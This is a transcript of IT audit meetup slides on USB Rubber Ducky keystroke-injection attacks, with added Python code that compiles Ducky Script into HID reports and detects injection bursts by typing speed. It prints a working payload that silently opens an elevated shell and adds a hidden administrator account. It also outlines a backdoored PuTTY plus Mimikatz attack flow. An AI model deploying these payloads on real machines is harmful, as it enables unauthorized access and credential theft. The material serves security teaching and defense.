Removable Disk Hacking for Fun and Profit
Rungga Reksya Sabilillah
Meetup #4 - IT Audit and IT Security: Removable Disk Hacking for Fun and Profit
1.
Meetup #4 IT Audit and Security: Removable Disk Hacking for Fun and Profit
2.
@rungga_reksya
Incident Classification Patterns (2015 Data Breach Investigations Report)
Web App Attack: 40%
Top 10 threat action varieties within Web App Attack breaches (n=879):
831 Hacking: use of stolen credentials
817 Hacking: use of backdoor
817 Social: phishing
812 Malware: spyware / key logger
3.
What is the motivation for attack? (Source: ISACA and RSA Conference Survey 2015)
Categories on the chart: Financial Gain, Intellectual Property Theft, Disruption of Service, Theft of Classified Data, Theft of Personally Identifiable Information.
Values on the chart: 32%, 24%, 19%, 11%, 10%.
4.
Mr. Robot S01-E06 & Hacker Movie 2016
5.
Rubber Ducky
The USB Rubber Ducky ($44.99) is a Human Interface Device programmable with a simple scripting language, allowing penetration testers to quickly and easily craft and deploy security auditing payloads that mimic human keyboard input. The source is written in C and requires the AVR Studio 5 IDE from atmel.com/avrstudio. Hardware is commercially available at hakshop.com. Tools and payloads can be found at usbrubberducky.com. Quack!
Source: https://github.com/hak5darren/USB-Rubber-Ducky
6.
Ducky Script
Ducky Script is the language of the USB Rubber Ducky. Scripts can be written in any common ASCII text editor such as Notepad, vi, emacs, nano, gedit, kedit, TextEdit, etc.
Ducky Script syntax is simple. Each command resides on a new line and may have options follow. Commands are written in ALL CAPS, because ducks are loud and like to quack with pride. Most commands invoke keystrokes, key combos or strings of text, while some offer delays or pauses. Below is a list of commands and their function, followed by some example usage. Note: below, n represents a number and Char represents characters A-Z, a-z.
REM: similar to the REM command in BASIC and other languages, lines beginning with REM will not be processed. REM is a comment.
DELAY: creates a momentary pause in the Ducky Script. It is quite handy for creating a moment of pause between sequential commands that may take the target computer some time to process. DELAY time is specified in milliseconds, from 1 to 10000.
STRING: processes the text that follows, taking special care to auto-shift. STRING can accept a single character or multiple characters.
Extended commands: ENTER, BREAK, CAPSLOCK, DELETE, END, ESC, HOME, PRINTSCREEN, etc.
7.
Rubber Ducky Script for Fun and Profit

My Script:
REM Add user first
DELAY 3000
CONTROL ESCAPE
DELAY 1000
STRING cmd
DELAY 1000
CTRL-SHIFT ENTER
DELAY 1000
ALT y
DELAY 300
ENTER
ALT SPACE
DELAY 1000
STRING m
DELAY 1000
DOWNARROW
REPEAT 100
ENTER
STRING net user miicas password.123 /add
ENTER
STRING net localgroup administrators miicas /add
ENTER

Fake Putty: backdoored executable, built as described at https://www.offensive-security.com/metasploit-unleashed/backdooring-exe-files/
Mimikatz: https://github.com/gentilkiwi/mimikatz
Net User:
# net user miicas /add
# net localgroup administrators miicas /add
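To make the command semantics concrete, here is a minimal Ducky Script compiler in Python. It is an added example, not hak5's encoder and not part of the slides: it parses the commands the deck describes (REM, DELAY, STRING, REPEAT, single keys and modifier combos) into keystroke events and then into 8-byte USB HID boot-protocol keyboard reports. The keycodes are the standard USB HID usage IDs for a US layout; the script it compiles is the slide's own, with the REM translated. Reading the event list is also the quickest way to audit a payload before it is flashed.

```python
"""Minimal Ducky Script compiler: script text -> keystroke events -> USB HID reports (US layout)."""

# Modifier bits of HID report byte 0 (left-hand modifiers).
MOD = {"CTRL": 0x01, "CONTROL": 0x01, "SHIFT": 0x02, "ALT": 0x04, "GUI": 0x08, "WINDOWS": 0x08}

# Non-printing keys -> HID usage ID (USB HID Usage Tables, Keyboard/Keypad page).
SPECIAL = {"ENTER": 0x28, "ESC": 0x29, "ESCAPE": 0x29, "BACKSPACE": 0x2A, "TAB": 0x2B,
           "SPACE": 0x2C, "CAPSLOCK": 0x39, "PRINTSCREEN": 0x46, "BREAK": 0x48, "HOME": 0x4A,
           "PAGEUP": 0x4B, "DELETE": 0x4C, "END": 0x4D, "PAGEDOWN": 0x4E, "RIGHTARROW": 0x4F,
           "LEFTARROW": 0x50, "DOWNARROW": 0x51, "UPARROW": 0x52}
SPECIAL.update({f"F{i}": 0x39 + i for i in range(1, 13)})  # F1..F12 = 0x3A..0x45

# US layout: printable char -> (shift bit, usage ID). STRING's "auto-shift" comes from here.
LAYOUT = {" ": (0, 0x2C)}
for i, c in enumerate("abcdefghijklmnopqrstuvwxyz"):
    LAYOUT[c], LAYOUT[c.upper()] = (0, 0x04 + i), (0x02, 0x04 + i)
for i, (plain, shifted) in enumerate(zip("1234567890", "!@#$%^&*()")):
    LAYOUT[plain], LAYOUT[shifted] = (0, 0x1E + i), (0x02, 0x1E + i)
for plain, shifted, code in zip("-=[]\\;'`,./", "_+{}|:\"~<>?",
                                (0x2D, 0x2E, 0x2F, 0x30, 0x31, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38)):
    LAYOUT[plain], LAYOUT[shifted] = (0, code), (0x02, code)


def key_combo(line):
    """'CTRL-SHIFT ENTER', 'ALT y', 'DOWNARROW' -> ('key', modifier_bits, usage_id)."""
    mods, code = 0, 0
    for tok in line.replace("-", " ").split():
        up = tok.upper()
        if up in MOD:
            mods |= MOD[up]
        elif up in SPECIAL:
            code = SPECIAL[up]
        elif len(tok) == 1 and tok in LAYOUT:
            shift, code = LAYOUT[tok]
            mods |= shift
        else:
            raise ValueError(f"unknown key token {tok!r} in {line!r}")
    return ("key", mods, code)


def compile_ducky(script):
    """Compile script text into a list of ('delay', ms) and ('key', mods, usage_id) events."""
    events, last = [], []
    for raw in script.splitlines():
        line = raw.strip()
        if not line:
            continue
        cmd, _, arg = line.partition(" ")
        if cmd == "REM":                 # comment, never processed
            continue
        if cmd == "REPEAT":              # replay the previous command n times
            events.extend(last * int(arg))
            continue
        if cmd == "DELAY":
            ms = int(arg)
            if not 1 <= ms <= 10000:     # the range the slide gives for DELAY
                raise ValueError(f"DELAY out of range: {ms}")
            last = [("delay", ms)]
        elif cmd == "STRING":            # one keystroke per character, shift applied as needed
            last = [("key",) + LAYOUT[ch] for ch in arg]
        else:
            last = [key_combo(line)]
        events.extend(last)
    return events


def to_hid_reports(events):
    """8-byte boot keyboard reports [mods, 0, key1..key6]; each key is a press then a release."""
    reports = []
    for ev in events:
        if ev[0] == "key":
            reports.append(bytes([ev[1], 0, ev[2], 0, 0, 0, 0, 0]))
            reports.append(bytes(8))  # all-zero report = release
    return reports


def total_delay_ms(events):
    return sum(ev[1] for ev in events if ev[0] == "delay")


# The slide's script (REM translated from Indonesian).
SLIDE_SCRIPT = """REM Add user first
DELAY 3000
CONTROL ESCAPE
DELAY 1000
STRING cmd
DELAY 1000
CTRL-SHIFT ENTER
DELAY 1000
ALT y
DELAY 300
ENTER
ALT SPACE
DELAY 1000
STRING m
DELAY 1000
DOWNARROW
REPEAT 100
ENTER
STRING net user miicas password.123 /add
ENTER
STRING net localgroup administrators miicas /add
ENTER
"""

if __name__ == "__main__":
    evs = compile_ducky(SLIDE_SCRIPT)
    print(len(evs), "events,", total_delay_ms(evs), "ms of delays,",
          len(to_hid_reports(evs)), "HID reports")
```

Reading the compiled events for the slide's script explains why it works the way it does: CTRL-SHIFT ENTER launches cmd elevated, ALT y answers the UAC prompt, ALT SPACE then m plus 101 DOWNARROWs drags the console window off screen so the typed net user commands are never seen, and the 8.3 seconds of DELAY are there to let the target keep up.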
8.
9.
General Flow (tested on Windows Server 2008 R2; attacker OS is Kali Linux)
- Deploy "puttyremote.exe" and "mimikatz.exe" into "/var/www/html/"
- Create the payload for the Rubber Ducky
- Listen on the VPS
- Social engineering
- Success
10.
Rubber Ducky: How to Control?
Control references (ISO/IEC 27001:2013 Annex A numbering):
8.3.1 Management of removable media
11.2.8 Unattended user equipment
11.2.9 Clear screen policy
12.2 Protection from malware
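The controls above are policy-level; a practitioner will also want a technical check. The following is an added example, not part of the slides and not a vendor tool: it flags keystroke injection by typing cadence, since a Rubber Ducky types with near-zero, machine-regular gaps between keys and a person cannot. It assumes a host-side keystroke monitor that records (timestamp_ms, key) pairs; the samples below are constructed, with the injected text taken from the slide's own script. This is a heuristic: a DELAY between STRING commands breaks the run, so min_keys should be tuned to the shortest injected string worth catching.

```python
"""Flag keystroke-injection bursts by inter-key timing (constructed sample data)."""
from statistics import median

# Constructed samples: a person typing a command, and the slide's first injected
# command typed at ~4 ms per key, as a USB HID attack device would.
HUMAN_SAMPLE = [(0, "n"), (180, "e"), (290, "t"), (520, " "), (610, "u"),
                (830, "s"), (900, "e"), (1120, "r")]
INJECTED_TEXT = "net user miicas password.123 /add"
DUCKY_SAMPLE = [(5000 + 4 * i, ch) for i, ch in enumerate(INJECTED_TEXT)]
MIXED_SAMPLE = HUMAN_SAMPLE + DUCKY_SAMPLE + [(9000 + t, k) for t, k in HUMAN_SAMPLE]


def find_injection_bursts(events, max_gap_ms=20, min_keys=8):
    """Return (start, end, median_gap_ms) for every run of at least min_keys keystrokes
    in which each inter-key gap is <= max_gap_ms. end is exclusive."""
    bursts, start = [], 0
    for i in range(1, len(events) + 1):
        in_run = i < len(events) and events[i][0] - events[i - 1][0] <= max_gap_ms
        if not in_run:                       # run ends here (or at end of input)
            if i - start >= min_keys:
                gaps = [events[k][0] - events[k - 1][0] for k in range(start + 1, i)]
                bursts.append((start, i, median(gaps)))
            start = i
    return bursts


def burst_text(events, burst):
    """Reconstruct what a burst typed, for the alert body."""
    start, end, _ = burst
    return "".join(key for _, key in events[start:end])


if __name__ == "__main__":
    for b in find_injection_bursts(MIXED_SAMPLE):
        print(f"injection suspected: {b[1] - b[0]} keys, median gap {b[2]} ms: {burst_text(MIXED_SAMPLE, b)!r}")
```

Typing-speed thresholds of this kind are what the open-source "duck hunting" tools rely on; they catch the STRING payload but not single key combos, so pair the check with device-installation restrictions on new keyboard-class devices and with the clear-screen and unattended-equipment controls listed above.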
11.
Rungga Reksya Sabilillah, ST, MMSI
LA ISO 27001, LA ISO 20000, LA ISO 22301, OSCP, CEH, ECSA, CND
Thank You For Your Attention